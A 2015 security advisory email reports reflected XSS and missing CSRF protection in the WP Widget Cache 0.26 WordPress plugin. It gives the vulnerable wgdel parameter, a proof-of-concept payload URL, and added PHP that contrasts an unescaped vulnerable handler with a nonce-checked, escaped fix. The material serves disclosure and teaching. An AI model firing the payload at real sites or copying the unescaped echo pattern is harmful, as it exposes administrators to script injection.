Subject: Cross-Site Scripting (XSS) in WP Widget Cache 0.26
Date: Tue, 25 Aug 2015 11:21:18 +0200

Hello,

Plugin: WP Widget Cache 0.26 https://wordpress.org/plugins/wp-widget-cache/

1. Reflected Cross-Site Scripting (XSS)

Authenticated administrators can inject HTML/JS code (and there is no CSRF protection on the request!).

Method: GET
URL: http://localhost/wp-admin/widgets.php?wgdel=[xss]
Vulnerable parameters: wgdel

Example PHP callstack:
WidgetCache::widget_wgdel_notice   [/wp-widget-cache/widget-cache.php:332]

Verification:
http://localhost/wp-admin/widgets.php?wgdel=%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E
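Added illustration (not code from the plugin; the advisory does not reproduce the handler): a hypothetical notice function shaped like the one described, beside a hardened version that requires a nonce and escapes the value before printing it. Function names, the capability checked and the nonce action are assumptions for the example.

```php
<?php
// Added example, not the WP Widget Cache plugin's code. The vulnerable shape
// mirrors the advisory: the wgdel query value is printed back into widgets.php.

// Vulnerable pattern (hypothetical): raw query value lands in the page HTML,
// and any GET to widgets.php?wgdel=... reaches it (no nonce, so no CSRF check).
function wgdel_notice_vulnerable() {
    if ( empty( $_GET['wgdel'] ) ) {
        return;
    }
    echo '<div class="updated"><p>Cache of widget ' . $_GET['wgdel'] . ' cleared.</p></div>';
}

// Hardened version: renders only for a capable user, only on a request that
// carries a nonce bound to that widget id, and escapes the id for HTML output.
function wgdel_notice_hardened() {
    if ( empty( $_GET['wgdel'] ) ) {
        return;
    }
    // widgets.php is itself gated on this capability; re-check here regardless.
    if ( ! current_user_can( 'edit_theme_options' ) ) {
        return;
    }
    $widget_id = sanitize_text_field( wp_unslash( $_GET['wgdel'] ) );
    $nonce     = isset( $_GET['_wpnonce'] ) ? wp_unslash( $_GET['_wpnonce'] ) : '';

    // The nonce action includes the widget id, so a forged or altered link fails.
    // 'wgdel-' is an assumed action name for this example.
    if ( ! wp_verify_nonce( $nonce, 'wgdel-' . $widget_id ) ) {
        wp_die( 'Invalid or missing nonce for widget cache deletion.' );
    }

    // esc_html() encodes &, <, >, " and ' for this HTML text context, so a
    // value such as the one in the verification URL is shown literally.
    printf(
        '<div class="updated"><p>Cache of widget %s cleared.</p></div>',
        esc_html( $widget_id )
    );
}

// The legitimate link must carry the matching nonce; this is the only way a
// request acquires one, which is what removes the CSRF vector.
function wgdel_link( $widget_id ) {
    $url = add_query_arg( 'wgdel', rawurlencode( $widget_id ), admin_url( 'widgets.php' ) );
    return wp_nonce_url( $url, 'wgdel-' . $widget_id );
}
```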


--
Regards,
Marcin Probola,